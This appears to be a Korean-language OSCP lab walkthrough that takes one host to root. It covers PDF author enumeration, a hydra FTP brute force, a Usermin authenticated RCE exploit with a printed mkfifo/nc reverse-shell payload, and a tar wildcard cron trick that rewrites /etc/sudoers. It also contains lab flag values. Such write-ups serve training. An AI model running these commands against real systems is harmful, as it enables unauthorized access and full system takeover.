888653 bytes received in 00:01 (648.10 KiB/s)pdf 작성자 확인
- Cassie
- Mark
- Robert
┌──(kali🎃kali)-[~/oscp/157]
└─$ exiftool *.pdf | grep Author
Author : Cassie
Author : Mark
Author : Roberthydra로 ftp 로그인 브루트포스
- cassie / cassie로 로그인 가능
┌──(kali🎃kali)-[~/oscp/157]
└─$ hydra -L users.txt -P users.txt ftp://192.168.135.157 -t 50
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-26 11:54:55
[DATA] max 36 tasks per 1 server, overall 36 tasks, 36 login tries (l:6/p:6), ~1 try per task
[DATA] attacking ftp://192.168.135.157:21/
[21][ftp] host: 192.168.135.157 login: cassie password: cassie
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-26 11:55:0020000번 포트로 웹 서비스 접속
- Usermin 서비스
- cassie / cassie로 로그인 성공
Usermin Authenticated RCE 취약점 존재
┌──(kali🎃kali)-[~/oscp/157/userminrce]
└─$ searchsploit Usermin
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Usermin 1.750 - Remote Command Execution (Metasploit) | linux/webapps/46468.rb
Usermin 1.820 - Remote Code Execution (RCE) (Authenticated) | linux/webapps/50234.py
Usermin 2.100 - Username Enumeration | multiple/webapps/52254.py
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing | linux/remote/22275.pl
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/2017.pl
Webmin Usermin 2.100 - Username Enumeration | perl/webapps/52114.py
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------POC 다운로드
┌──(kali🎃kali)-[~/oscp/157/userminrce]
└─$ searchsploit -m 50234
Exploit: Usermin 1.820 - Remote Code Execution (RCE) (Authenticated)
URL: https://www.exploit-db.com/exploits/50234
Path: /usr/share/exploitdb/exploits/linux/webapps/50234.py
Codes: N/A
Verified: False
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/oscp/157/userminrce/50234.pyPOC 코드에서 listen_ip 수정 후 실행
┌──(kali🎃kali)-[~/oscp/157]
└─$ python 50234.py --host 192.168.135.157 --login cassie --password cassie
/home/kali/oscp/157/50234.py:82: SyntaxWarning: invalid escape sequence '\?'
last_gets_key = re.findall("edit_key.cgi\?(.*?)'",str(key_list.content))[-2]
[+] Target https://192.168.135.157:20000
[+] Login successfully
[+] Setup GnuPG
[+] Payload {'name': '";rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.199 1337 >/tmp/f;echo "', 'email': '1337@webmin.com'}
[+] Setup successful
[+] Fetching key list
[+] Key : idx=3\
Traceback (most recent call last):nc 리버스 쉘 연결 성공
┌──(kali🎃kali)-[~/oscp/157]
└─$ rlwrap nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.135.157] 41580
sh: cannot set terminal process group (1019): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.1$Read local.txt
sh-5.1$ cat local.txt
cat local.txt
52ceea799729705181436ea3b8f0fabb
sh-5.1$ ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.157 netmask 255.255.255.0 broadcast 192.168.135.255
ether 00:50:56:ab:84:03 txqueuelen 1000 (Ethernet)
RX packets 274061 bytes 24052097 (24.0 MB)
RX errors 0 dropped 1178 overruns 0 frame 0
TX packets 315997 bytes 53660451 (53.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 3760 bytes 270530 (270.5 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3760 bytes 270530 (270.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Privilege Escalation
linux-smart-enumeration
- tar wild card 사용 발견
[!] ret060 Can we write to executable paths present in cron jobs........... yes!
---
/etc/cron.d/2minutes:*/2 * * * * root cd /opt/admin && tar -zxf /tmp/backup.tar.gz *tar Wildcard Privilege Escalation을 위한 파일 생성
cassie@oscp:/opt/admin$ echo "" > '--checkpoint=1'
cassie@oscp:/opt/admin$ echo "" > '--checkpoint-action=exec=sh shell.sh'
cassie@oscp:/opt/admin$ echo "echo 'cassie ALL=(root) NOPASSWD: ALL' > /etc/sudoers" > shell.sh
cassie@oscp:/opt/admin$ ls -l
total 12
-rw-r--r-- 1 cassie cassie 1 Dec 26 17:48 --checkpoint-action=exec=sh shell.sh
-rw-r--r-- 1 cassie cassie 1 Dec 26 17:47 --checkpoint=1
-rw-r--r-- 1 cassie cassie 54 Dec 26 17:51 shell.sh기다리면 tar 명령어가 실행되어 sudoers 파일이 수정되고 sudo 명령을 비밀번호 없이 사용 가능함. 그래서 root 계정으로 전환
User cassie may run the following commands on oscp:
(root) NOPASSWD: ALL
cassie@oscp:/opt/admin$ sudo su -
sudo su -
root@oscp:~#Read proof.txt
cat /root/proof.txt
ce856bfe9c26dadac2a32898adf525cd
root@oscp:~# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.157 netmask 255.255.255.0 broadcast 192.168.135.255
ether 00:50:56:ab:84:03 txqueuelen 1000 (Ethernet)
RX packets 278529 bytes 25437073 (25.4 MB)
RX errors 0 dropped 1374 overruns 0 frame 0
TX packets 318780 bytes 54844065 (54.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 4892 bytes 350922 (350.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4892 bytes 350922 (350.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0